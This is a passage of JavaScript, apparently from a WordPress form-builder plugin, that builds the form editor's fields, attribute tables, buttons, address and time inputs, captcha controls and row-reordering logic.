      field_id_text.setAttribute("style", "width:350px");
      field_id_text.setAttribute("value",  '');
      var field_name = document.createElement('label');
      field_name.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px; margin-right:3px";
      field_name.innerHTML = "Fields name ";
      var field_name_text = document.createElement('input');
      field_name_text.setAttribute("type", "text");
      field_name_text.setAttribute("id", "field_name");
      field_name_text.setAttribute("disabled", "disabled");
      field_name_text.setAttribute("style", "width:350px");
      field_name_text.setAttribute("value", '');
      edit_main_td0.appendChild(field_id);
      edit_main_td0.appendChild(field_id_text);
      edit_main_td0.appendChild(br);
      edit_main_td0.appendChild(field_name);
      edit_main_td0.appendChild(field_name_text);
      edit_main_tr0.appendChild(edit_main_td0);
      edit_main_table.insertBefore(edit_main_tr0,edit_main_table.childNodes[0]);		
      refresh_id_name(i, type);
      break;
		}
	}
}


function refresh_id_name(i, type) {
	switch (type) {
		case 'type_radio': {
			document.getElementById('field_id').value = '';
			for (k = 0; k < 50; k++) {
				if (document.getElementById(i+'_elementform_id_temp' + k)) {
					document.getElementById('field_id').value	+= i + '_elementform_id_temp' + k + ', ';
        }
			}
			a = document.getElementById('field_id').value.slice(0, -2);
			document.getElementById('field_id').value = a;
			document.getElementById('field_name').value	= i + '_element';

			break;
		}
		case 'type_checkbox': {
			document.getElementById('field_id').value = '';
			for (k = 0; k < 50; k++) {
				if (document.getElementById(i + '_elementform_id_temp' + k)) {	
					document.getElementById('field_id').value	+= i + '_elementform_id_temp' + k + ', ';
				}
			}
			a = document.getElementById('field_id').value.slice(0, -2);
			document.getElementById('field_id').value	= a;
			document.getElementById('field_name').value	= a;
			break;

		}
    case 'type_range': {
			document.getElementById('field_id').value = '';
			for (k = 0; k < 2; k++) {
        document.getElementById('field_id').value	+= i + '_elementform_id_temp' + k + ', ';
			}
			a = document.getElementById('field_id').value.slice(0, -2);
			document.getElementById('field_id').value	= a;
			document.getElementById('field_name').value	= a;
			break;

		}
		case 'type_grading': {
			document.getElementById('field_id').value = '';
			for (k = 0; k < 50; k++) {
				if (document.getElementById(i + '_elementform_id_temp' + k)) {
					document.getElementById('field_id').value	+= i + '_elementform_id_temp' + k + ', ';
				}
			}
			a = document.getElementById('field_id').value.slice(0, -2);
			document.getElementById('field_id').value	= a;
			document.getElementById('field_name').value	= a;
			break;
		}
	}
}



function add_attr(i, type)
{
		
	var el_attr_table=document.getElementById('attributes');
	j=parseInt(el_attr_table.lastChild.getAttribute('idi'))+1;
	w_attr_name[j]="attribute";
	w_attr_value[j]="value";
	var el_attr_tr = document.createElement('tr');
		el_attr_tr.setAttribute("id", "attr_row_"+j);
		el_attr_tr.setAttribute("idi", j);
	var el_attr_td_name = document.createElement('td');
		el_attr_td_name.style.cssText = 'width:100px';
	var el_attr_td_value = document.createElement('td');
		el_attr_td_value.style.cssText = 'width:100px';
	
	var el_attr_td_X = document.createElement('td');
	var el_attr_name = document.createElement('input');
		el_attr_name.setAttribute("type", "text");
		el_attr_name.style.cssText = "width:100px";
		el_attr_name.setAttribute("value", w_attr_name[j]);
		el_attr_name.setAttribute("id", "attr_name"+j);
		el_attr_name.setAttribute("onChange", "change_attribute_name('"+i+"', this, '"+type+"')");	
		
	var el_attr_value = document.createElement('input');
		el_attr_value.setAttribute("type", "text");
		el_attr_value.style.cssText = "width:100px";
		el_attr_value.setAttribute("value", w_attr_value[j]);
		el_attr_value.setAttribute("id", "attr_value"+j);
		el_attr_value.setAttribute("onChange", "change_attribute_value('"+i+"', "+j+", '"+type+"')");
	
	var el_attr_remove = document.createElement('img');
		el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
		el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
		el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
		el_attr_remove.setAttribute("align", 'top');
		el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", '"+type+"')");
	el_attr_table.appendChild(el_attr_tr);
	el_attr_tr.appendChild(el_attr_td_name);
	el_attr_tr.appendChild(el_attr_td_value);
	el_attr_tr.appendChild(el_attr_td_X);
	el_attr_td_name.appendChild(el_attr_name);
	el_attr_td_value.appendChild(el_attr_value);
	el_attr_td_X.appendChild(el_attr_remove);
refresh_attr(i, type);
}

function change_attribute_value(id, x, type)
{
	if(!document.getElementById("attr_name"+x).value)
	{
		alert('The name of the attribute is required.');
		return
	}
	
	if(document.getElementById("attr_name"+x).value.toLowerCase()=="style")
	{
		alert('Sorry, you cannot add a style attribute here. Use "Class name" instead.');
		return
	}
	
	refresh_attr(id, type);
}

function change_attribute_name(id, x, type)
{
	value=x.value;
	if(!value)
	{
		alert('The name of the attribute is required.');
		return;
	}
	
	if(value.toLowerCase()=="style")
	{
		alert('Sorry, you cannot add a style attribute here. Use "Class name" instead.');
		return;
	}
	
	if(value==parseInt(value))
	{
		alert('The name of the attribute cannot be a number.');
		return;
	}
	
	if(value.indexOf(" ")!=-1)
	{	
		var regExp = /\s+/g;
		value=value.replace(regExp,''); 
		x.value=value;
		alert("The name of the attribute cannot contain a space.");
		refresh_attr(id, type);
		return;
	}	
	
	refresh_attr(id, type);
	
}

function remove_attr(id, el_id,type)
{
	tr=document.getElementById("attr_row_"+id);
	tr.parentNode.removeChild(tr);
	refresh_attr(el_id, type);
}

function change_attributes(id, attr)
{
	
var div = document.createElement('div');
var element=document.getElementById(id);
	element.setAttribute(attr, '');
}

function add_button(i)
{
	edit_main_td4=document.getElementById('buttons');
	if(edit_main_td4.lastChild)
		j=parseInt(edit_main_td4.lastChild.getAttribute("idi"))+1;
	else
		j=1;
	var table_button = document.createElement('table');
	
	table_button.setAttribute("width", "100%");
	table_button.setAttribute("border", "0");
	table_button.setAttribute("id", "button_opt"+j);
	table_button.setAttribute("idi", j);
	var tr_button = document.createElement('tr');
	var tr_hr = document.createElement('tr');
	
	var td_button = document.createElement('td');
	var td_X = document.createElement('td');
	var td_hr = document.createElement('td');
	td_hr.setAttribute("colspan", "3");
	
	tr_hr.appendChild(td_hr);
	tr_button.appendChild(td_button);
	tr_button.appendChild(td_X);
	table_button.appendChild(tr_hr);
	table_button.appendChild(tr_button);
	
	var br1 = document.createElement('br');
	
	var hr = document.createElement('hr');
	
	hr.setAttribute("id", "br"+j);
	
	
	
	
	var el_title_label = document.createElement('label');
	
		el_title_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		
		el_title_label.innerHTML = "Button name";
	
	var el_title = document.createElement('input');
	
		el_title.setAttribute("id", "el_title"+j);
		
		el_title.setAttribute("type", "text");
	
		el_title.setAttribute("value", "Button");
		
		el_title.style.cssText =   "width:100px; margin-left:43px; padding:0; border-width: 1px";
		
		el_title.setAttribute("onKeyUp", "change_label('"+i+"_elementform_id_temp"+j+"', this.value);");
	
	
	
	var el_func_label = document.createElement('label');
	
		el_func_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		
		el_func_label.innerHTML = "OnClick function";
	
	var el_func = document.createElement('input');
	
		el_func.setAttribute("id", "el_func"+j);
		
		el_func.setAttribute("type", "text");
		
		el_func.setAttribute("value", "");
		
		el_func.style.cssText =   "width:100px; margin-left:20px;; padding:0; border-width: 1px";
		
		el_func.setAttribute("onKeyUp", "change_func('"+i+"_elementform_id_temp"+j+"', this.value);");
	
	var el_choices_remove = document.createElement('img');
	
		el_choices_remove.setAttribute("id", "el_button"+j+"_remove");
		
		el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
		
		el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
		
		el_choices_remove.setAttribute("align", 'top');
		
		el_choices_remove.setAttribute("onClick", "remove_button("+j+","+i+")");
	
	
	
	td_hr.appendChild(hr);
	
	td_button.appendChild(el_title_label);
	
	td_button.appendChild(el_title);
	td_button.appendChild(br1);
	td_button.appendChild(el_func_label);
	
	td_button.appendChild(el_func);
	td_X.appendChild(el_choices_remove);
	edit_main_td4.appendChild(table_button);
	
	element='button';	type='button'; 
	
	td2=document.getElementById(i+"_element_sectionform_id_temp");
	
	var adding = document.createElement(element);
			adding.setAttribute("type", type);
			adding.setAttribute("id", i+"_elementform_id_temp"+j);
			adding.setAttribute("name", i+"_elementform_id_temp"+j);
			adding.setAttribute("value", "Button");
			adding.innerHTML =  "Button";
			adding.setAttribute("onclick", "");
			
			
	td2.appendChild(adding);
	
refresh_attr(i,'type_checkbox');
}

function remove_button(j,i)
{
	table=document.getElementById('button_opt'+j);
	button=document.getElementById(i+'_elementform_id_temp'+j);
	table.parentNode.removeChild(table);
	button.parentNode.removeChild(button);
}

function change_date_format(value, id)
{
	input_p=document.getElementById(id+'_buttonform_id_temp');
		input_p.setAttribute("onclick", "return showCalendar('"+id+"_elementform_id_temp' , '"+value+"')");
		input_p.setAttribute("format", value);
}

function set_send(id)
{	
if(document.getElementById(id).value=="yes")
	document.getElementById(id).setAttribute("value", "no")
else
	document.getElementById(id).setAttribute("value", "yes")
}

function change_class(x, id) {
	if(document.getElementById(id+'_label_sectionform_id_temp'))
	document.getElementById(id+'_label_sectionform_id_temp').setAttribute("class",x);
	if(document.getElementById(id+'_element_sectionform_id_temp'))
	document.getElementById(id+'_element_sectionform_id_temp').setAttribute("class",x);
}

function set_required(id)
{	
	if(document.getElementById(id+"form_id_temp").value=="yes")
	{
		document.getElementById(id+"form_id_temp").setAttribute("value", "no");
		document.getElementById(id+"_elementform_id_temp").innerHTML="";
	}	
	else
	{
		document.getElementById(id+"form_id_temp").setAttribute("value", "yes")
		document.getElementById(id+"_elementform_id_temp").innerHTML=" *";
	}
}

function disable_fields(id, field) {	
	var div = document.getElementById(id + "_div_address");		
	if (field) {
		if (document.getElementById("el_"+field).checked==true) {
			document.getElementById(id+"_disable_fieldsform_id_temp").setAttribute(field, "yes");
    }
		else {
			document.getElementById(id+"_disable_fieldsform_id_temp").setAttribute(field, "no");
    }
	}
  div.innerHTML = '';
  var hidden_labels = new Array();
  var address_fields = ['street1','street2','city','state','postal','country']
  var left_right = 0;
  for (l = 0; l < 6; l++) {
    if (document.getElementById(id+'_disable_fieldsform_id_temp').getAttribute(address_fields[l])=='no') {
      if (address_fields[l]=='street1' || address_fields[l]=='street2') {
        var street = document.createElement('input');
        street.setAttribute("type", 'text');
        street.style.cssText = "width:100%";
        street.setAttribute("id", id+"_"+address_fields[l]+"form_id_temp");
        street.setAttribute("name", (parseInt(id)+l)+"_"+address_fields[l]+"form_id_temp");
        street.setAttribute("onChange", "change_value('"+id+"_"+address_fields[l]+"form_id_temp')");
        var street_label = document.createElement('label');
        street_label.setAttribute("class", "mini_label");	
        street_label.setAttribute("id", id+"_mini_label_"+address_fields[l]);
        street_label.style.cssText = "display:block;";
        street_label.innerHTML=document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
        w_mini_labels[l] = document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
        var span_addres = document.createElement('span');
        span_addres.style.cssText = "float:left; width:100%;  padding-bottom: 8px; display:block";	
        span_addres.appendChild(street);
        span_addres.appendChild(street_label);
        div.appendChild(span_addres);				
      }
      else {
        left_right++;
        if (address_fields[l] != 'country') {
          var field = document.createElement('input');
          field.setAttribute("type", 'text');
          field.style.cssText = "width:100%";
          field.setAttribute("id", id+"_"+address_fields[l]+"form_id_temp");
          field.setAttribute("name", (parseInt(id)+l)+"_"+address_fields[l]+"form_id_temp");
          field.setAttribute("onChange", "change_value('"+id+"_"+address_fields[l]+"form_id_temp')");
          var field_label = document.createElement('label');
          field_label.setAttribute("class", "mini_label");		
          field_label.setAttribute("id", id+"_mini_label_"+address_fields[l]);
          field_label.style.cssText = "display:block;";
          field_label.innerHTML=document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
          w_mini_labels[l] = document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
        }
        else {
          var field = document.createElement('select');
          field.setAttribute("type", 'text');
          field.style.cssText = "width:100%";
          field.setAttribute("id", id+"_countryform_id_temp");
          field.setAttribute("name", (parseInt(id)+l)+"_countryform_id_temp");
          field.setAttribute("onChange", "change_value('"+id+"_countryform_id_temp')");
          var field_label = document.createElement('label');
          field_label.setAttribute("class", "mini_label");	
          field_label.setAttribute("id", id+"_mini_label_country");
          field_label.style.cssText = "display:block;";
          field_label.innerHTML=document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
          w_mini_labels[l] = document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
          var option_ = document.createElement('option');
          option_.setAttribute("value", "");
          option_.innerHTML = "";
          field.appendChild(option_);
          coutries=["Afghanistan","Albania",	"Algeria","Andorra","Angola","Antigua and Barbuda","Argentina","Armenia","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bhutan","Bolivia","Bosnia and Herzegovina","Botswana","Brazil","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Canada","Cape Verde","Central African Republic","Chad","Chile","China","Colombi","Comoros","Congo (Brazzaville)","Congo","Costa Rica","Cote d'Ivoire","Croatia","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","East Timor (Timor Timur)","Ecuador","Egypt","El Salvador","Equatorial Guinea","Eritrea","Estonia","Ethiopia","Fiji","Finland","France","Gabon","Gambia, The","Georgia","Germany","Ghana","Greece","Grenada","Guatemala","Guinea","Guinea-Bissau","Guyana","Haiti","Honduras","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Israel","Italy","Jamaica","Japan","Jordan","Kazakhstan","Kenya","Kiribati","Korea, North","Korea, South","Kuwait","Kyrgyzstan","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Marshall Islands","Mauritania","Mauritius","Mexico","Micronesia","Moldova","Monaco","Mongolia","Morocco","Mozambique","Myanmar","Namibia","Nauru","Nepa","Netherlands","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palau","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Qatar","Romania","Russia","Rwanda","Saint Kitts and Nevis","Saint Lucia","Saint Vincent","Samoa","San Marino","Sao Tome and Principe","Saudi Arabia","Senegal","Serbia and Montenegro","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","Solomon Islands","Somalia","South Africa","Spain","Sri Lanka","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Togo","Tonga","Trinidad and Tobago","Tunisia","Turkey","Turkmenistan","Tuvalu","Uganda","Ukraine","United Arab Emirates","United Kingdom","United States","Uruguay","Uzbekistan","Vanuatu","Vatican City","Venezuela","Vietnam","Yemen","Zambia","Zimbabwe"];	
          for (r = 0; r < coutries.length; r++) {
            var option_ = document.createElement('option');
            option_.setAttribute("value", coutries[r]);
            option_.innerHTML=coutries[r];
            field.appendChild(option_);
          }
        }
        if (left_right % 2 != 0) {
          var span_addres = document.createElement('span');
          span_addres.style.cssText = "float:left; width:48%; padding-bottom: 8px;";
        }
        else {
          var span_addres = document.createElement('span');
          span_addres.style.cssText = "float:right; width:48%; padding-bottom: 8px;";
        }
        span_addres.appendChild(field);
        span_addres.appendChild(field_label);
        div.appendChild(span_addres);
      }
    }
    else {
      var hidden_field = document.createElement('input');
      hidden_field.setAttribute("type", 'hidden');
      hidden_field.setAttribute("id", id+"_"+address_fields[l]+"form_id_temp");
      hidden_field.setAttribute("value", document.getElementById("el_"+address_fields[l]+"_label").innerHTML);
      hidden_field.setAttribute("id_for_label", parseInt(id)+l); 
      hidden_labels.push(hidden_field);
    }
    for (k = 0; k < hidden_labels.length; k++) {
      div.appendChild(hidden_labels[k]);
    }
	}
  jQuery(document).ready(function() {
    jQuery("label#"+id+"_mini_label_street1").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var street1 = "<input type='text' class='street1' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(street1);					
        jQuery("input.street1").focus();		
        jQuery("input.street1").blur(function() {	
          var value = jQuery(this).val();			
          jQuery("#"+id+"_mini_label_street1").text(value);		
          document.getElementById('el_street1_label').innerHTML=	value;	
        });		
      }	
    });
    jQuery("label#"+id+"_mini_label_street2").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var street2 = "<input type='text' class='street2'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(street2);					
        jQuery("input.street2").focus();		
        jQuery("input.street2").blur(function() {	
          var value = jQuery(this).val();			
          jQuery("#"+id+"_mini_label_street2").text(value);
          document.getElementById('el_street2_label').innerHTML=	value;		
        });		
      }	
    });
    jQuery("label#"+id+"_mini_label_city").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var city = "<input type='text' class='city'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(city);			
        jQuery("input.city").focus();				
        jQuery("input.city").blur(function() {			
          var value = jQuery(this).val();		
          jQuery("#"+id+"_mini_label_city").text(value);	
          document.getElementById('el_city_label').innerHTML=	value;		
        });
      }
    });
    jQuery("label#"+id+"_mini_label_state").click(function() {		
      if (jQuery(this).children('input').length == 0) {	
        var state = "<input type='text' class='state'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
        jQuery(this).html(state);		
        jQuery("input.state").focus();		
        jQuery("input.state").blur(function() {		
          var value = jQuery(this).val();			
          jQuery("#"+id+"_mini_label_state").text(value);
          document.getElementById('el_state_label').innerHTML=	value;		
        });	
      }
    });
    jQuery("label#"+id+"_mini_label_postal").click(function() {
      if (jQuery(this).children('input').length == 0) {			
        var postal = "<input type='text' class='postal'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(postal);			
        jQuery("input.postal").focus();			
        jQuery("input.postal").blur(function() {			
          var value = jQuery(this).val();		
          jQuery("#"+id+"_mini_label_postal").text(value);	
          document.getElementById('el_postal_label').innerHTML=	value;		
        });	
      }
    });	
    jQuery("label#"+id+"_mini_label_country").click(function() {
      if (jQuery(this).children('input').length == 0) {		
        var country = "<input type='text' class='country'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(country);
        jQuery("input.country").focus();
        jQuery("input.country").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+id+"_mini_label_country").text(value);
          document.getElementById('el_country_label').innerHTML = value;
        });
      }
    });
	});
}

function set_unique(id)
{	
	if(document.getElementById(id).value=="yes")
	{
		document.getElementById(id).setAttribute("value", "no");
	}	
	else
	{
		document.getElementById(id).setAttribute("value", "yes")
	}
}

function set_randomize(id)
{	
	if(document.getElementById(id).value=="yes")
	{
		document.getElementById(id).setAttribute("value", "no");
	}	
	else
	{
		document.getElementById(id).setAttribute("value", "yes")
	}
}
function show_other_input(num)
{
		for(k=0;k<50;k++)
			if(	document.getElementById(num+"_elementform_id_temp"+k)) 
				if(	document.getElementById(num+"_elementform_id_temp"+k).getAttribute('other')) 
					if(	document.getElementById(num+"_elementform_id_temp"+k).getAttribute('other')==1)
					{
						element_other=document.getElementById(num+"_elementform_id_temp"+k);
						break;
					}



	parent=element_other.parentNode;

	var br = document.createElement('br');
		br.setAttribute("id", num+"_other_brform_id_temp");
		
	var el_other = document.createElement('input');
		el_other.setAttribute("id", num+"_other_inputform_id_temp");
		el_other.setAttribute("name", num+"_other_inputform_id_temp");
		el_other.setAttribute("type", "text");
		el_other.setAttribute("class", "other_input");
	parent.appendChild(br);
	parent.appendChild(el_other);

}

function set_allow_other(num, type) {
	if (document.getElementById(num+'_allow_otherform_id_temp').value == "yes") {
		document.getElementById(num+'_allow_otherform_id_temp').setAttribute("value", "no");
		for (k = 0; k < 50; k++) {
			if (document.getElementById("el_choices" + k)) {
				if (document.getElementById("el_choices" + k).getAttribute('other')) {
					if (document.getElementById("el_choices" + k).getAttribute('other') == 1) {
						remove_choise(k, num, type);
						break;
					}
        }
      }
    }
	}
	else {
		document.getElementById(num+'_allow_otherform_id_temp').setAttribute("value", "yes");
		j++;
    var choices_td = document.getElementById('choices');
    var br = document.createElement('br');
    br.setAttribute("id", "br"+j);
    var el_choices = document.createElement('input');
    el_choices.setAttribute("id", "el_choices"+j);
    el_choices.setAttribute("type", "text");
    el_choices.setAttribute("value", "other");
    el_choices.setAttribute("other", "1");
    el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
    el_choices.setAttribute("onKeyUp", "change_label('"+num+"_label_element"+j+"', this.value); change_in_value('"+num+"_elementform_id_temp"+j+"', this.value)");
    var el_choices_remove = document.createElement('img');
    el_choices_remove.setAttribute("id", "el_choices"+j+"_remove");
    el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
    el_choices_remove.style.cssText =  'cursor:pointer;vertical-align:middle; margin:3px; display:none';
    el_choices_remove.setAttribute("align", 'top');
    el_choices_remove.setAttribute("onClick", "remove_choise('"+j+"','"+num+"','"+type+"')");
    choices_td.appendChild(br);
    choices_td.appendChild(el_choices);
    choices_td.appendChild(el_choices_remove);
    if (type == 'checkbox') {
      refresh_attr(num, 'type_checkbox');
    }
    if (type == 'radio') {
			refresh_attr(num, 'type_radio');
    }
    refresh_rowcol(num, type);
	}
}

function flow_hor(id)
{
	tbody=document.getElementById(id+'_table_little');
	td_array= new Array();
	n=tbody.childNodes.length;
	for(k=0; k<n;k++)
		td_array[k]=tbody.childNodes[k].childNodes[0];
		
	for(k=0; k<n;k++)
		tbody.removeChild(tbody.childNodes[0]);
		
	var tr = document.createElement('tr');
           	tr.setAttribute("id", id+"_hor");
			
	tbody.appendChild(tr);
	for(k=0; k<n;k++)
		tr.appendChild(td_array[k]);
}

function flow_ver(id)
{	
	tbody=document.getElementById(id+'_table_little');
	tr=document.getElementById(id+'_hor');
	td_array= new Array();
	n=tr.childNodes.length;
	
	for(k=0; k<n;k++)
		td_array[k]=tr.childNodes[k];
			
	tbody.removeChild(tr);
	
	for(k=0; k<n;k++)
	{      	
		var tr_little = document.createElement('tr');
			tr_little.setAttribute("id", id+"_element_tr"+td_array[k].getAttribute("idi"));
		tr_little.appendChild(td_array[k]);
		tbody.appendChild(tr_little);
	}			
}

function check_isnum_3_10(e)
{
	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 51 || chCode1 > 57))
        return false
	else if((document.getElementById('captcha_digit').value+(chCode1-48))>9)
        return false;
	return true;
}

function set_sel_am_pm(select_)
{
	if(select_.options[0].selected) 
	{
		select_.options[0].setAttribute("selected", "selected");
		select_.options[1].removeAttribute("selected");
	}
	else
	{
		select_.options[1].setAttribute("selected", "selected");
		select_.options[0].removeAttribute("selected");
	}

}

function change_captcha_digit(digit)
{
	captcha=document.getElementById('_wd_captchaform_id_temp');
	if(document.getElementById('captcha_digit').value)
	{	
		captcha.setAttribute("digit", digit);
	
		captcha.setAttribute("src", url_for_ajax + "?action=formcontactwdcaptcha&digit="+digit+"&i=form_id_temp");
		document.getElementById('_wd_captcha_inputform_id_temp').style.width=(document.getElementById('captcha_digit').value*10+15)+"px";
	}
	else
	{
		captcha.setAttribute("digit", "6");
		captcha.setAttribute("src", url_for_ajax+"?action=formcontactwdcaptcha&digit=6&i=form_id_temp");
		document.getElementById('_wd_captcha_inputform_id_temp').style.width=(6*10+15)+"px";
	}
}

function second_no(id)
{	
	time_box=document.getElementById(id+'_tr_time1');
	text_box=document.getElementById(id+'_tr_time2');
	second_box=document.getElementById(id+'_td_time_input3');
	second_text=document.getElementById(id+'_td_time_label3');
	document.getElementById(id+'_td_time_input2').parentNode.removeChild(document.getElementById(id+'_td_time_input2').nextSibling);
	time_box.removeChild(second_box);
	text_box.removeChild(second_text.previousSibling);
	text_box.removeChild(second_text);
	
}

function second_yes(id, w_ss)
{	
	time_box=document.getElementById(id+'_tr_time1');
	text_box=document.getElementById(id+'_tr_time2');
	
	var td_time_input2_ket = document.createElement('td');
           	td_time_input2_ket.setAttribute("align", "center");
	var td_time_input3 = document.createElement('td');
           	td_time_input3.setAttribute("id", id+"_td_time_input3");
			
      	var td_time_label2_ket = document.createElement('td');
	
      	var td_time_label3 = document.createElement('td');
           	td_time_label3.setAttribute("id", id+"_td_time_label3");

	var mm_ = document.createElement('span');
        mm_.setAttribute("class", 'wdform_colon');
		mm_.style.cssText = "font-style:bold; vertical-align:middle";
		mm_.innerHTML="&nbsp;:&nbsp;";
	td_time_input2_ket.appendChild(mm_);
		
	var ss = document.createElement('input');

           	ss.setAttribute("type", 'text');
           	ss.setAttribute("value", w_ss);
		
           	ss.setAttribute("class", "time_box");
		ss.setAttribute("id", id+"_ssform_id_temp");
		ss.setAttribute("name", id+"_ssform_id_temp");
		ss.setAttribute("onKeyPress", "return check_second(event, '"+id+"_ssform_id_temp')");
		ss.setAttribute("onKeyUp", "change_second(event, '"+id+"_ssform_id_temp')");
		ss.setAttribute("onBlur", "add_0('"+id+"_ssform_id_temp')");
	var ss_label = document.createElement('label');
           	ss_label.setAttribute("class", "mini_label");
            ss_label.setAttribute("id", id+"_mini_label_ss");
		ss_label.innerHTML="SS";

	td_time_input3.appendChild(ss);
	td_time_label3.appendChild(ss_label);
	
	if(document.getElementById(id+'_am_pm_select'))
	{
		select_=document.getElementById(id+"_am_pm_select");
		select_text=document.getElementById(id+"_am_pm_label");
		
		time_box.insertBefore(td_time_input3, select_);
		time_box.insertBefore(td_time_input2_ket, td_time_input3);
		
		text_box.insertBefore(td_time_label3, select_text);
		text_box.insertBefore(td_time_label2_ket, td_time_label3);
	}
	else
	{
	time_box.appendChild(td_time_input2_ket);
	time_box.appendChild(td_time_input3);
	text_box.appendChild(td_time_label2_ket);
	text_box.appendChild(td_time_label3);
	}
  refresh_attr(id, 'type_time');
  jQuery(document).ready(function() {
		jQuery("label#"+id+"_mini_label_ss").click(function() {
      if (jQuery(this).children('input').length == 0) {
        var ss = "<input type='text' class='ss' style='outline: none; border: none; background: none; width: 40px;' value=\""+jQuery(this).text()+"\">";
        jQuery(this).html(ss);
        jQuery("input.ss").focus();
        jQuery("input.ss").blur(function() {
          var value = jQuery(this).val();
          jQuery("#"+id+"_mini_label_ss").text(value);
        });
      }
    });
	});
}

function check_isnum_interval(e, id, from, to) {
  var chCode1 = e.which || e.keyCode;
  if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57)) {
    return false;
  }
  val = "" + document.getElementById(id).value+String.fromCharCode(chCode1);
	if (val.length > 2) {
    return false;
  }
  if (val == '00') {
    return false;
  }
  if ((val<from) || (val>to)) {
    return false;
  }
  return true;
}

function check_isnum_point(e) {
  var chCode1 = e.which || e.keyCode;
  if (chCode1 == 46) {
    return true;
  }
	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57)) {
    return false;
  }
  return true;
}

function check_isnum(e) {
  var chCode1 = e.which || e.keyCode;
  if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57)) {
    return false;
  }
	return true;
}

function check_isnum_or_minus(e) {
  var chCode1 = e.which || e.keyCode;
  if (chCode1 != 45 ) {
    if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57)) {
      return false;
    }
	}
	return true;
}

function check_isspacebar(e) {
  var chCode1 = e.which || e.keyCode;
  if (chCode1 == 32 ) {
    return false;
  }
	return true;
}

function change_w_style(id, w)
{
	if(document.getElementById(id))
	document.getElementById(id).style.width=w+"px";
}

function change_w_label(id, w)
{
	if(document.getElementById(id))
	document.getElementById(id).innerHTML=w;
}

function change_h_style(id, h)
{
	document.getElementById(id).style.height=h+"px";
}

function change_w(id, w)
{
	document.getElementById(id).setAttribute("width", w)
}

function change_h(id, h)
{
	document.getElementById(id).setAttribute("height", h);
}

function change_key(value, attribute)
{
	document.getElementById('wd_recaptchaform_id_temp').setAttribute(attribute, value);
}

function captcha_refresh(id)
{	
	srcArr=document.getElementById(id+"form_id_temp").src.split("&r=");
	document.getElementById(id+"form_id_temp").src=srcArr[0]+'&r='+Math.floor(Math.random()*100);
	document.getElementById(id+"_inputform_id_temp").value='';
}

function up_row(id)
{
	form=document.getElementById(id).parentNode;
	k=0;
	
	while(form.childNodes[k])
	{
		if(form.childNodes[k].getAttribute("id"))
			if(id==form.childNodes[k].getAttribute("id"))
				break;
		k++;
	}
	
	if(k!=0)
	{
		up=form.childNodes[k-1];
		down=form.childNodes[k];
		form.removeChild(down);
		form.insertBefore(down, up);
		return;
	}
	
		///////////en depqum yerb section breaka
	form_view_elemet		=form.parentNode.parentNode.parentNode.parentNode;
	
	current_tr		=form.parentNode.parentNode.parentNode;
	
	if(current_tr.previousSibling)
	if(current_tr.previousSibling.nodeType==3)
	{
		if(current_tr.previousSibling.previousSibling.getAttribute('type'))
		{
			current_tr.previousSibling.previousSibling.previousSibling.previousSibling.firstChild.firstChild.firstChild.appendChild(document.getElementById(id));
			return;
		}
	}
	else
	{
		if(current_tr.previousSibling.getAttribute('type'))
		{
			current_tr.previousSibling.previousSibling.firstChild.firstChild.firstChild.appendChild(document.getElementById(id));
			return;
		}
	}
	
				
			///////////pagei mej
			page_up(id);
}

function down_row(id)
{
	form=document.getElementById(id).parentNode;
	l=form.childNodes.length;
	k=0;
	while(form.childNodes[k])
	{
	if(id==form.childNodes[k].id)
		break;
	k++;
	}

	if(k!=l-1)
	{
	///////////ira mej
		up=form.childNodes[k];
		down=form.childNodes[k+2];
		form.removeChild(up);
		
		if(!down)
			down=null;

			form.insertBefore(up, down);
			return;
	}
	///////////en depqum yerb section breaka
	form_view_elemet		=form.parentNode.parentNode.parentNode.parentNode;
	
	current_tr		=form.parentNode.parentNode.parentNode;
	
	if(current_tr.nextSibling.nodeType==3)
	{
		if(current_tr.nextSibling.nextSibling.getAttribute('type'))
